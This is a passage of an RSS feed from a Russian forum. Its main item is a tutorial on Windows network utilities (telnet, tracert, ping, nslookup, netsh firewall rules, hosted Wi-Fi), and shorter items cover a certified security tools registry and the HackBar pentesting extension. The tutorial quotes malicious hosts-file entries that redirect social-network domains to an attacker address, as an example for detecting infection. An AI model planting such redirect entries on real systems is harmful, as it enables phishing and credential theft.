						&lt;p&gt;После подключения к удаленному серверу, вводимые с клавиатуры символы будут передаваться на обработку удаленной системе и, для возврата в командную строку telnet , требуется ввод специальной комбинации клавиш переключения режима (Escape character) - по умолчанию это CTRL-] &amp;#46; Для выхода из telnet используется команда quit&amp;#46;&lt;/p&gt;
						&lt;p&gt;На практике, как правило, используется запуск telnet с параметрами по умолчанию и с указанием имени или IP-адреса и номера порта TCP удаленной системы&amp;#46;&lt;/p&gt;
						&lt;p&gt;telnet 192&amp;#46;168&amp;#46;1&amp;#46;1 - подключиться к серверу telnet узла 192&amp;#46;168&amp;#46;1&amp;#46;1&lt;/p&gt;
						&lt;p&gt;telnet yandex&amp;#46;ru 80 - подключиться к серверу HTTP (TCP порт 80) узла yandex&amp;#46;ru&lt;/p&gt;
						&lt;p&gt;Если подключение невозможно, то утилита telnet завершится сообщением&amp;#58;&lt;/p&gt;
						&lt;p&gt;Не удалось открыть подключение к этому узлу на порт &amp;#46; &amp;#46; &amp;#46; Сбой подключения&amp;#46;&lt;/p&gt;
						&lt;p&gt;Если имя или IP-адрес в командной строке достижимы, то такое сообщение говорит о том, что заданный порт не слушается удаленной системой ( или закрыт брандмауэром) &amp;#46; Если же удаленная система не поддерживает текстовое (telnet-like) управление, то, как правило, соединение устанавливается, экран терминала остается пустым, и после нажатия любой клавиши, сессия может завершиться, но сообщения о сбое соединения не будет&amp;#46; В некоторых случаях, удаленный сервер, не поддерживающий телнетоподобный протокол может выдать баннер, отображая информацию о себе, как например, это делают серверы VNC, отбражая версию протокола RFB&amp;#46; Примеры использования telnet для отправки простого e-mail сообщения имеются в этой статье&lt;/p&gt;
						&lt;p&gt;В операционных системах Windows 7, Windows Server 2008,Windows Server 2008 R2, для управления службой TELNET на локальном или удаленном компьютере можно воспользоваться специальной утилитой tlntadmn, позволяющей запустить, приостановить, остановить или продолжить работу сервера TELNET, а также настроить некоторые параметры его конфигурации&amp;#46;&lt;/p&gt;
						&lt;p&gt;В Windows 7 и более поздних версиях, сервер и клиент telnet при установке системы не инсталлируются&amp;#46; Для того, чтобы воспользоваться утилитой telnet&amp;#46;exe, нужно добавить ее в систему используя “Панель управления” – “Программы и компоненты” – “Включение или отключение компонентов Windows” – установить галочку на “Клиент Telnet”&amp;#46; При необходимости, можно таким же образом установить и сервер Telnet&amp;#46;&lt;/p&gt;
						&lt;p&gt;Утилита TRACERT&amp;#46;EXE&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Не смотря на появление утилиты PATHPIG, классическая утилита трассировки маршрута до заданного узла TRACERT , по-прежнему остается наиболее часто используемым инструментом сетевой диагностики&amp;#46; Утилита позволяет получить цепочку узлов, через которые проходит IP-пакет, адресованный конечному узлу&amp;#46; В основе трассировки заложен метод анализа ответов при последоательной отправке ICMP-пакетов на указанный адрес с увеличивающимся на 1 полем TTL&amp;#46; (&amp;quot;Время жизни&amp;quot; - Time To Live)&amp;#46; На самом деле это поле не имеет отношения к времени, а является счетчиком числа возможных переходов при передаче маршрутизируемого пакета&amp;#46; Каждый маршрутизатор, получив пакет, вычитает из этого поля 1 и проверяет значение счетчика TTL&amp;#46; Если значение стало равным нулю, такой пакет отбрасывается и отправителю посылается ICMP-сообщение о превышении времени жизни (&amp;quot;Time Exceeded&amp;quot; - значение 11 в заголовке ICMP)&amp;#46; Если бы не было предусмотрено включение поля TTL в IP пакеты, то при ошибках в маршрутах, могда бы возникнуть ситуация, когда пакет будет вечно циркулировать в сети, пересылаемый маршрутизаторами по кругу&amp;#46;&amp;#160; &amp;#160; &amp;#160;При выполнении команды tracert&amp;#46;exe сначала выполняется отправка ICMP пакета с полем TTL равным 1 и первый в цепочке маршрутизатор (обычно это основной шлюз из настроек сетевого подключения) вычтя единицу из TTL получает его нулевое значение и сообщает о превышении времени жизни&amp;#46; Эта последовательность повторяется трижды, поэтому в строке результата, формируемой tracert&amp;#46;exe, после номера перехода отображаются три значения времени отклика&amp;#58;&lt;br /&gt;1&amp;#160; &amp;#160; &amp;#160;1 ms&amp;#160; &amp;#160; &amp;#160;&amp;lt;1&amp;#160; &amp;#160; &amp;#160;&amp;lt;1&amp;#160; &amp;#160; &amp;#160;192&amp;#46;168&amp;#46;1&amp;#46;1&lt;br /&gt;1 - номер перехода (1 - первый маршрутизатор)&lt;br /&gt;1 ms &amp;lt;1 &amp;lt;1 - время его ответа для 3-х попыток (1ms и 2 ответа менее чем 1 ms)&lt;br /&gt;192&amp;#46;168&amp;#46;1&amp;#46;1 - его адрес (или имя)&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Затем процедура повторяется, но TTL устанавливается равным 2 - первый маршрутизатор его уменьшит до 1 и отправит следующему в цепочке, который после вычитания 1 обнулит TTL и сообщит о превышении времени жизни&amp;#46; И так далее, пока не будет достигнут заданный узел, имя или адрес которого заданы в качестве параметра командной строки, например , tracert yandex&amp;#46;ru , или до обнаружения неисправности, не позволяющей доставить пакет узлу yandex&amp;#46;ru&amp;#46;&lt;/p&gt;
						&lt;p&gt;Пример результатов выполнения tracert google&amp;#46;com&lt;/p&gt;
						&lt;p&gt;tracert google&amp;#46;com - трассировка маршрута к узлу google&amp;#46;com&lt;/p&gt;
						&lt;p&gt;Результат&amp;#58;&lt;/p&gt;
						&lt;p&gt;Трассировка маршрута к google&amp;#46;com [74&amp;#46;125&amp;#46;45&amp;#46;100] с максимальным числом прыжков 30&amp;#58;&lt;br /&gt;1 1 ms &amp;lt;1 &amp;lt;1 192&amp;#46;168&amp;#46;1&amp;#46;1&lt;br /&gt;2 498 ms 444 ms 302 ms ppp83-237-220-1&amp;#46;pppoe&amp;#46;mtu-net&amp;#46;ru [83&amp;#46;237&amp;#46;220&amp;#46;1]&lt;br /&gt;3 * * * &amp;#46;&lt;br /&gt;4 282 ms * * a197-crs-1-be1-53&amp;#46;msk&amp;#46;stream-internet&amp;#46;net [212&amp;#46;188&amp;#46;1&amp;#46;113]&lt;br /&gt;5 518 ms 344 ms 382 ms ss-crs-1-be5&amp;#46;msk&amp;#46;stream-internet&amp;#46;net [195&amp;#46;34&amp;#46;59&amp;#46;105]&lt;br /&gt;6 462 ms 440 ms 335 ms m9-cr01-po3&amp;#46;msk&amp;#46;stream-internet&amp;#46;net [195&amp;#46;34&amp;#46;53&amp;#46;85]&lt;br /&gt;7 323 ms 389 ms 339 ms bor-cr01-po4&amp;#46;spb&amp;#46;stream-internet&amp;#46;net [195&amp;#46;34&amp;#46;53&amp;#46;126]&lt;br /&gt;8 475 ms 302 ms 420 ms anc-cr01-po3&amp;#46;ff&amp;#46;stream-internet&amp;#46;net [195&amp;#46;34&amp;#46;53&amp;#46;102]&lt;br /&gt;9 334 ms 408 ms 348 ms 74&amp;#46;125&amp;#46;50&amp;#46;57&lt;br /&gt;10 451 ms 368 ms 524 ms 209&amp;#46;85&amp;#46;255&amp;#46;178&lt;br /&gt;11 329 ms 542 ms 451 ms 209&amp;#46;85&amp;#46;250&amp;#46;140&lt;br /&gt;12 616 ms 480 ms 645 ms 209&amp;#46;85&amp;#46;248&amp;#46;81&lt;br /&gt;13 656 ms 549 ms 422 ms 216&amp;#46;239&amp;#46;43&amp;#46;192&lt;br /&gt;14 378 ms 560 ms 534 ms 216&amp;#46;239&amp;#46;43&amp;#46;113&lt;br /&gt;15 511 ms 566 ms 546 ms 209&amp;#46;85&amp;#46;251&amp;#46;9&lt;br /&gt;16 543 ms 682 ms 523 ms 72&amp;#46;14&amp;#46;232&amp;#46;213&lt;br /&gt;17 468 ms 557 ms 486 ms 209&amp;#46;85&amp;#46;253&amp;#46;141&lt;br /&gt;18 593 ms 589 ms 575 ms yx-in-f100&amp;#46;google&amp;#46;com [74&amp;#46;125&amp;#46;45&amp;#46;100]&lt;/p&gt;
						&lt;p&gt;Трассировка завершена&amp;#46;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В результатах трассировки могут присутствовать строки, где вместо адреса узла отображается звездочка (узел номер 3 в примере)&amp;#46; Это не обязательно является признаком неисправности маршрутизатора, и чаще всего, говорит о том, что настройки данного узла запрещают ICMP-протокол из соображений безопасности или уменьшения нагрузки на канал &amp;#46; Подобные же настройки используются в сетях корпорации Microsoft &amp;#46; Для проверки, попробуйте выполнить трассировку маршрута к узлу microsoft&amp;#46;com &amp;#46;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Примеры практического использования сетевых утилит командной строки&amp;#46;&lt;/p&gt;
						&lt;p&gt;Определение подмены адреса узла в файле hosts&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Одним из последствий вирусного заражения довольно часто является блокировка доступа к сайтам антивирусных компаний, поисковым системам, популярным социальным сетям (Vkontakte, Odnoklassniki, Facebook, Twitter и т&amp;#46;п&amp;#46;)&amp;#46; Подобный же прием используется для кражи учетных данных пользователей путем перенаправления на вредоносный сайт, адрес которого берется из зараженного файла hosts&amp;#46;&lt;/p&gt;
						&lt;p&gt;Порядок преобразования доменных имен в IP-адреса следующий&amp;#58;&lt;/p&gt;
						&lt;p&gt;- проверяется наличие данных об имени в кэш службы разрешения имен (процедура определения IP по имени уже выполнялась, и в памяти есть актуальные результаты)&amp;#46; Если запись есть, то будут использованы ее данные&amp;#46;&lt;/p&gt;
						&lt;p&gt;- проверяется наличие записи об имени и адресе в файле hosts&amp;#46; Если запись есть, то будут использованы ее данные&amp;#46;&lt;/p&gt;
						&lt;p&gt;- для разрешения доменного имени в IP-адрес выполняется запрос к серверу DNS, заданному в настройках сетевого подключения&amp;#46;&lt;/p&gt;
						&lt;p&gt;Файл hosts при настройках по умолчанию, находится в каталоге \Windows\system32\drivers\etc\ и обычно содержит строки, начинающиеся с символа # , являющиеся комментариями, и одну запись для определения имени узла петлевого интерфейса&amp;#58;&lt;/p&gt;
						&lt;p&gt;127&amp;#46;0&amp;#46;0&amp;#46;1 localhost&lt;/p&gt;
						&lt;p&gt;127&amp;#46;0&amp;#46;0&amp;#46;1 - IP-адрес, localhost - имя&amp;#46; Если добавить запись 127&amp;#46;0&amp;#46;0&amp;#46;1 odnoklassniki&amp;#46;ru, то для имени odnoklassniki&amp;#46;ru будет использоваться адрес 127&amp;#46;0&amp;#46;0&amp;#46;1, который не предназначен для выполнения реальной передачи данных, и сервер с указанным именем станет недоступен&amp;#46; Если же вместо адреса 127&amp;#46;0&amp;#46;0&amp;#46;1 использовать адрес поддельного сервера, созданного злоумышленниками, то вместо реального сайта, соответствующего доменному имени, посетитель перейдет на поддельную страницу&amp;#46;&lt;br /&gt;Структура записей файла hosts предполагает, что между адресом и соответствующим ему именем должен быть хотя бы один символ табуляции (пробел)&amp;#46; Каждой записи отводится одна строка в файле hosts&amp;#46; Иногда, вредоносная программа выполняет смещение записей относительно отображаемой на экране части файла, заполняя видимую часть пробелами, а в непомещающейся в области просмотра части, могут присутствовать записи, например&lt;/p&gt;
						&lt;p&gt;31&amp;#46;214&amp;#46;145&amp;#46;172 odnoklassniki&amp;#46;ru&lt;br /&gt;31&amp;#46;214&amp;#46;145&amp;#46;172 www&amp;#46;facebook&amp;#46;com&lt;br /&gt;31&amp;#46;214&amp;#46;145&amp;#46;172 www&amp;#46;vk&amp;#46;com&lt;br /&gt;31&amp;#46;214&amp;#46;145&amp;#46;172 www&amp;#46;vkontakte&amp;#46;ru&lt;/p&gt;
						&lt;p&gt;Данный адрес взят из реально зараженного файла hosts и принадлежит сети одного из провайдеров Германии&amp;#46; Сейчас он безопасен, и не занят обслуживанием вредоносного сервера&amp;#46;&lt;br /&gt;На зараженном компьютере, в файл hosts было добавлено множество пустых строк, и поддельные записи располагались с разным смещением относительно начала строки, что могло затруднить ручной поиск&amp;#46; Кроме того, вредоносные программы могут использовать и некоторые другие способы подмены содержимого hosts - изменение местоположения самого файла, использование атрибута &amp;quot;скрытый&amp;quot; и имени с подменой символа на похожий по написанию символ национального алфавита - &amp;quot;o&amp;quot; и т&amp;#46;п&amp;#46; Другими словами, достоверно определить сам факт подмены адреса с помощью файла hosts, путем прямого анализа содержимого реестра, системных каталогов и самого файла занимает довольно длительное время и не всегда позволяет исключить ошибку поиска вредоносных записей&amp;#46; А, тем временем, задача легко решается с использованием всего лишь 2-х команд из рассмотренных выше - ping и nslookup &amp;#46;&lt;/p&gt;
						&lt;p&gt;ping odnoklassniki&amp;#46;ru - в ответе на пинг будет отображаться адрес, соответствующий имени odnoklassniki&amp;#46;ru при определении IP-адреса на данном компьютере&lt;/p&gt;
						&lt;p&gt;nslookup odnoklassniki&amp;#46;ru - получить IP-адрес, соответствующий имени odnoklassniki&amp;#46;ru от сервера DNS&amp;#46;&lt;/p&gt;
						&lt;p&gt;Если адрес по результатам пинга отличается от адреса, полученного от DNS-сервера, то присутствует факт подмены содержимого файла hosts&amp;#46; Для некоторых крупных доменов утилита nslookup может выдавать список из нескольких IP&amp;#46; Тогда IP-адрес, полученный в результатах пинга, должен присутствовать в списке адресов от nslookup&amp;#46;&lt;/p&gt;
						&lt;p&gt;Иногда, в качестве способа блокировки определенных сайтов, используется добавление несуществующих статических маршрутов для соответствующих IP-адресов или подсетей, что легко отследить с помощью утилиты tracert&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Как открыть порт в брандмауэре Windows&lt;/p&gt;
						&lt;p&gt;Разрешить входящие соединения через брандмауэр Windows (открыть порт) можно с использованием контекста firewall утилиты netsh&lt;/p&gt;
						&lt;p&gt;netsh firewall set portopening protocol=TCP port=27015 name=MyServer mode=ENABLE scope=ALL&lt;br /&gt;или&lt;br /&gt;netsh firewall set portopening TCP 27015 MyServer ENABLE ALL&lt;br /&gt;protocol - Протокол порта&amp;#46; TCP (Transmission Control Protocol), UDP (User Datagram Protocol), ALL - Все протоколы&amp;#46;&lt;br /&gt;port - Номер порта&amp;#46;&lt;br /&gt;name - Имя порта (необязательно)&lt;br /&gt;mode - Режим порта&amp;#46; ENABLE - Пропускать через брандмауэр (по умолчанию)&amp;#46; DISABLE - Не пропускать через брандмауэр&amp;#46;&lt;br /&gt;scope - Область порта (необязательно)&amp;#46; ALL - Пропускать через брандмауэр весь трафик (по умолчанию)&amp;#46; SUBNET - Пропускать через брандмауэр только трафик локальной сети (подсети)&amp;#46; CUSTOM - Пропускать через брандмауэр только указанный трафик&amp;#46;&lt;/p&gt;
						&lt;p&gt;С учетом значений по умолчанию и необязательных параметров открыть TCP порт 27015 в брандмауэре Windows можно командой&lt;/p&gt;
						&lt;p&gt;netsh firewall set portopening TCP 27015&lt;/p&gt;
						&lt;p&gt;В Windows Vista/Windows7 пока поддерживается синтаксис приведенный в примере выше, однако в последующих версиях операционных систем он будет полностью заменен на контекст netsh advfirewall - управление улучшенным брандмауэром&amp;#46; Подсказку по использованию можно получить при вводе команды с параметром ? (знак вопроса) &amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall ?&lt;/p&gt;
						&lt;p&gt;В контексте правил для брандмауэра&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall ?&lt;/p&gt;
						&lt;p&gt;Для открытия порта 27015 в Windows 7 с учетом нового синтаксиса правильнее использовать команду&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall add rule name=&amp;quot;Open Port 27015&amp;quot; dir=in action=allow protocol=TCP localport=27015&lt;/p&gt;
						&lt;p&gt;add rule - добавить правило&lt;br /&gt;name - название правила&amp;#46; Название может быть произвольным, и если текст содержит пробелы - заключаться в двойные кавычки&amp;#46; Имя правила не должно принимать значение all&lt;br /&gt;dir - направление обмена данными (in-входящий трафик, out- исходящий)&lt;br /&gt;action - действие по отношению к попадающему под правило соединению (allow - разрешить, block - запретить)&lt;br /&gt;protocol - разновидность протокола&amp;#46; (TCP - протокол TCP, UDP - протокол UDP, ANY - любой протокол)&amp;#46; Если параметр protocol не указан, то используется значение по умолчанию - ANY )&lt;br /&gt;localport - номер порта на локальном компьютере&amp;#46; Можно указывать диапазон портов 0 -65535 или any - любой порт или номера через запятую - 67,69 &amp;#46;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Примеры правил брандмауэра Windows 7&lt;/p&gt;
						&lt;p&gt;По сравнению с предыдущими версиями Windows синтаксис правил стал немного сложнее, но и возможности брандмауэра значительно расширились&amp;#46;&lt;/p&gt;
						&lt;p&gt;Краткий список возможных параметров правил &amp;#58;&lt;/p&gt;
						&lt;p&gt;add rule name=&amp;lt;строка&amp;gt;&lt;br /&gt;dir=in|out&lt;br /&gt;action=allow|block|bypass&lt;br /&gt;[program=&amp;lt;путь к программе&amp;gt;]&lt;br /&gt;[service=&amp;lt;краткое имя службы&amp;gt;|any]&lt;br /&gt;[description=&amp;lt;строка&amp;gt;]&lt;br /&gt;[enable=yes|no (по умолчанию - yes)]&lt;br /&gt;[profile=public|private|domain|any[,&amp;#46;&amp;#46;&amp;#46;]]&lt;br /&gt;[localip=any|||&amp;lt;подсеть&amp;gt;|&amp;lt;диапазон&amp;gt;|&amp;lt;список&amp;gt;]&lt;br /&gt;[remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway| ||&amp;lt;подсеть&amp;gt;|&amp;lt;диапазон&amp;gt;|&amp;lt;список&amp;gt;]&lt;br /&gt;[localport=0-65535||&amp;lt;диапазон портов&amp;gt;[,&amp;#46;&amp;#46;&amp;#46;]|RPC|RPC-EPMap|IPHTTPS|any (по умолчанию - any)]&lt;br /&gt;[remoteport=0-65535|&amp;lt;диапазон портов&amp;gt;[,&amp;#46;&amp;#46;&amp;#46;]|any (по умолчанию - any)]&lt;br /&gt;[protocol=0-255|icmpv4|icmpv6|icmpv4&amp;#58;тип,код|icmpv6&amp;#58;тип,код| tcp|udp|any (по умолчанию - any)]&lt;br /&gt;[interfacetype=wireless|lan|ras|any]&lt;br /&gt;[rmtcomputergrp=&amp;lt;строка SDDL&amp;gt;]&lt;br /&gt;[rmtusrgrp=&amp;lt;строка SDDL&amp;gt;]&lt;br /&gt;[edge=yes|deferapp|deferuser|no (по умолчанию - no)]&lt;br /&gt;[security=authenticate|authenc|authdynenc|authnoencap|notrequired (по умолчанию - notrequired)]&lt;/p&gt;
						&lt;p&gt;Некоторые правила применения параметров&amp;#58;&lt;/p&gt;
						&lt;p&gt;Параметры могут следовать в произвольном порядке - dir=in action=allow и action=allow dir=in являются допустимыми значениями&amp;#46;&lt;br /&gt;Если указана удаленная группа пользователей или компьютеров, для параметра security необходимо установить значение authenticate, authenc, authdynenc или authnoencap&amp;#46;&lt;br /&gt;Установка authdynenc в качестве значения параметра security позволяет системам динамически согласовывать использование шифрования трафика, соответствующего данному правилу брандмауэра Windows&amp;#46; Шифрование согласуется в соответствии со свойствами существующего правила безопасности соединения&amp;#46; Этот параметр позволяет компьютеру принять первый пакет TCP или UDP входящего соединения IPsec, при условии, что он защищен, но не зашифрован, с помощью IPsec&amp;#46; Как только первый пакет будет обработан, сервер повторно согласует соединение и обновит его, чтобы все последующие соединения были полностью зашифрованы&amp;#46;&lt;/p&gt;
						&lt;p&gt;Если action=bypass, должна быть указана группа удаленных компьютеров, если dir=in&amp;#46;&lt;/p&gt;
						&lt;p&gt;Короткое имя службы можно посмотреть в ее свойствах, в поле Имя службы&amp;#46; Так, для службы &amp;quot;DNS-клиент&amp;quot; короткое имя - Dnscache &amp;#46; Если service=any, правило действует только для служб&amp;#46;&lt;/p&gt;
						&lt;p&gt;Значением кода или типа ICMP может быть any - любой ICMP трафик&amp;#46;&lt;/p&gt;
						&lt;p&gt;Параметр edge можно указывать только для правил входящего трафика (dir=in) &amp;#46;&lt;/p&gt;
						&lt;p&gt;AuthEnc и authnoencap нельзя использовать вместе&amp;#46; Если задан параметр authnoencap, то параметр security=authenticate задавать необязательно&amp;#46;&lt;/p&gt;
						&lt;p&gt;Параметр Authdynenc допустим только в том случае, если значение dir равно in&amp;#46;&lt;/p&gt;
						&lt;p&gt;Примеры&amp;#58;&lt;/p&gt;
						&lt;p&gt;Добавление правила для входящего трафика для программы qip&amp;#46;exe&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall add rule name=&amp;quot;allow QIP&amp;quot; dir=in program=&amp;quot;c&amp;#58;\programfiles\qip\qip&amp;#46;exe&amp;quot; action=allow&lt;/p&gt;
						&lt;p&gt;Добавление правила, запрещающего исходящий трафик для TCP порта 80&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall add rule name=&amp;quot;allow80&amp;quot; protocol=TCP dir=out localport=80 action=block&lt;/p&gt;
						&lt;p&gt;Добавление правила входящего трафика с требованием безопасности и шифрования для трафика через TCP-порт 80&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall add rule name=&amp;quot;Require Encryption for Inbound TCP/80&amp;quot; protocol=TCP dir=in localport=80 security=authdynenc action=allow&lt;/p&gt;
						&lt;p&gt;Добавление правила входящего трафика для messenger&amp;#46;exe с требованием безопасности&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall add rule name=&amp;quot;allow messenger&amp;quot; dir=in program=&amp;quot;c&amp;#58;\program files\messenger\msmsgs&amp;#46;exe&amp;quot; security=authenticate action=allow&lt;/p&gt;
						&lt;p&gt;Добавление правила обхода брандмауэра с проверкой подлинности для группы acmedomain\scanners, определяемой строкой SDDL&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall add rule name=&amp;quot;allow scanners&amp;quot; dir=in rmtcomputergrp=&amp;lt;строка SDDL&amp;gt; action=bypass security=authenticate&lt;/p&gt;
						&lt;p&gt;Добавление правила разрешения исходящего трафика для локальных портов 5000-5010 для udp&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall add rule name=&amp;quot;Allow port range&amp;quot; dir=out protocol=udp localport=5000-5010 action=allow&lt;/p&gt;
						&lt;p&gt;Для просмотра всех правил брандмауэра используется команда&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall show rule name=all&lt;br /&gt;netsh advfirewall firewall show rule name=all | more - с выдачей результатов на экран в постраничном режиме&lt;br /&gt;netsh advfirewall firewall show rule name=all &amp;gt; C&amp;#58;\firewallrues&amp;#46;txt - с выдачей результатов в файл&lt;/p&gt;
						&lt;p&gt;Для просмотра конкретного правила указывается его имя&amp;#46; Для удаления правила используется параметр delete&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall show rule name=TEST просмотр правила с именем TEST&lt;br /&gt;netsh advfirewall firewall delete rule name=test - удаление правила с именем TEST&lt;/p&gt;
						&lt;p&gt;Для изменения значений в существующих правилах используется параметр set и new перед изменяемым значением&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh advfirewall firewall set rule name=&amp;quot;Allow port range&amp;quot; new localport=5000-6000 изменить диапазон портов для правила &amp;quot;Allow port range&amp;quot;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Настройками по умолчанию, в режиме повышенной безопасности брандмауэр Windows 7 блокирует все входящие подключения, не соответствующие ни одному правилу и разрешает исходящие&amp;#46;&lt;/p&gt;
						&lt;p&gt;Wi-Fi точка доступа стандартными средствами Windows 7&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; В операционной системе Windows 7 реализована технология Virtual WiFi, позволяющая легко создавать программную точку доступа (Software Access Point - SoftAP) &amp;#46; В отличие от полноценных беспроводных точек доступа, реализуемая таким образом SoftAP, позволяет создать только один виртуальный адаптер, который будет работать только в режиме точки доступа, и может быть использовано шифрование только по WPA2-PSK/AES&amp;#46; Тем не менее, этого вполне достаточно для создания функциональной беспроводной сети без реально существующей точки доступа&amp;#46; Такая сеть, обозначается как Wireless Hosted Network, или просто Hosted Network ( Размещенная Сеть )&amp;#46;&lt;/p&gt;
						&lt;p&gt;Для создания размещенной сети используется команды сетевой оболочки netsh&amp;#46;exe в контексте wlan&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh wlan set hostednetwork [mode=]allow|disallow - разрешить или запретить использование размещенной сети&amp;#46;&lt;br /&gt;netsh wlan set hostednetwork [ssid=]&amp;lt;идентификатор_SSID&amp;gt; [key=]&amp;lt;парольная_фраза&amp;gt; [keyUsage=]persistent|temporary - задать параметры размещённой сети&amp;#46;&lt;br /&gt;ssid - идентификатор SSID сети, другими словами - имя беспроводной сети;&lt;br /&gt;key - ключ безопасности, используемый в данной сети, т&amp;#46;е&amp;#46; парольная фраза, используемая при подключении клиентов к виртуальной точке доступа&amp;#46; Ключ должен быть строкой символов ASCII длиной от 8 до 63 знаков&amp;#46;&lt;br /&gt;keyUsage - указывает, является ключ безопасности постоянным или временным&amp;#46; По умолчанию, ключ является постоянным ( persistent ) и используется при каждом включении размещенной сети&amp;#46;&lt;/p&gt;
						&lt;p&gt;Примеры&amp;#58;&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; set hostednetwork mode=allow&lt;br /&gt;&amp;#160; &amp;#160; set hostednetwork ssid=ssid1&lt;br /&gt;&amp;#160; &amp;#160; set hostednetwork key=passphrase keyUsage=persistent&lt;br /&gt;&amp;#160; &amp;#160; set hostednetwork mode=allow ssid=MyWiFi key=MyPassWord &lt;/p&gt;
						&lt;p&gt;Или - одной командной строкой&amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh wlan set hostednetwork mode=allow ssid=MyWiFi key=MyPassWord - создать виртуальную точку доступа Wi-Fi с именем MyWiFi и паролем MyPassWord&lt;/p&gt;
						&lt;p&gt;Созданная программная точка доступа не будет запущена автоматически&amp;#46; Для запуска потребуется выполнить команду &amp;#58;&lt;/p&gt;
						&lt;p&gt;netsh wlan start hostednetwork&lt;br /&gt;Для остановки - netsh wlan stop hostednetwork&lt;/p&gt;
						&lt;p&gt;При использовании команд управления размещенной сетью требуются права администратора&amp;#46;&lt;br /&gt;Для организации доступа в Интернет с использованием размещенной сети можно воспользоваться совместным подключением через, созданный после выполнения команды создания размещенной сети , виртуальный сетевой адаптер - Адаптер мини-порта виртуального WiFi Microsoft (Microsoft Virtual WiFi miniport adapter) &amp;#46; Если же данный адаптер не обнаруживается в диспетчере учтройств и отсутствует в списке сетевых адаптеров, то наиболее вероятно, что драйвер реального Wi-Fi устройства не сертифицирован для использования в операционной системе Windows 7 и не поддерживает технологию Virtual WiFi&amp;#46;&lt;/p&gt;
						&lt;p&gt;Как получить список беспроводных сетей стандартными средствами Windows 7&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; Ниже приведено содержимое командного файла, который позволяет собрать список беспроводных сетей, включая имя, уровень сигнала, BSSID&amp;#46; Информация записывается в файл wlans&amp;#46;txt каталога временных файлов и открывается для просмотра с помощью редактора wordpad&lt;/p&gt;
						&lt;p&gt;chcp 1251&lt;br /&gt;netsh wlan show networks mode=bssid &amp;gt; %TEMP%\wlans&amp;#46;txt&lt;br /&gt;start &amp;quot;LIST&amp;quot; &amp;quot;%ProgramFiles%\Windows NT\Accessories\wordpad&amp;#46;exe&amp;quot; %TEMP%\wlans&amp;#46;txt&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;Дополнительно &amp;#58;&lt;/p&gt;
						&lt;p&gt;Примеры использования некоторых сетевых утилит командной строки для поиска причины отсутствия доступа в Интернет&lt;/p&gt;
						&lt;p&gt;Методика поиска и устранения причины отсутствия доступа к конкретному сайту, или группе сайтов&amp;#46;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (cmd)</author>
			<pubDate>Tue, 10 Mar 2015 13:41:31 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=38#p38</guid>
		</item>
		<item>
			<title>g66.ru</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=35#p35</link>
			<description>&lt;p&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;https://21.mvd.ru/favico.ico&quot; alt=&quot;https://21.mvd.ru/favico.ico&quot; /&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (21.mvd.ru)</author>
			<pubDate>Mon, 09 Mar 2015 19:31:25 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=35#p35</guid>
		</item>
		<item>
			<title>Полезные ссылки</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=33#p33</link>
			<description>&lt;p&gt;Государственный реестр сертифицированных средств защиты информации&lt;/p&gt;
						&lt;p&gt;Весьма полезная информация на официальном сайте ФСТЭК. В электронной таблице перечислены популярные программные и аппаратные средства для защиты информации, прошедшие сертификацию ФСТЭК (Федеральная служба по техническому и экспортному контролю).&lt;/p&gt;</description>
			<author>mybb@mybb.ru (ФСТЭК)</author>
			<pubDate>Wed, 11 Feb 2015 18:49:00 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=33#p33</guid>
		</item>
		<item>
			<title>Браузерные расширения</title>
			<link>https://antik.mybb.ru/viewtopic.php?pid=32#p32</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;HackBar — расширение Firefox для хакеров&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Данная панель инструментов поможет вам в тестировании sql-инъекций, XSS «дырок» и общей безопасности сайта. Это расширение не инструмент для выполнения эксплойтов (от англ. — exploit) и оно не научит взламывать сайт (или стать хакером). Первостепенная роль расширения — помочь разработчикам в проверке степени безопасности их кода. Если вы знаете что вам требуется сделать, то эта панель поможет сделать это быстрее. Если вы только хотите научиться находить пробелы в безопасности, то вы также можете использовать эту панель, но вам потребуется как минимум книга и «много-много гугла».&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Смирнов А.В.)</author>
			<pubDate>Mon, 24 Nov 2014 09:30:38 +0300</pubDate>
			<guid>https://antik.mybb.ru/viewtopic.php?pid=32#p32</guid>
		</item>
		<item>
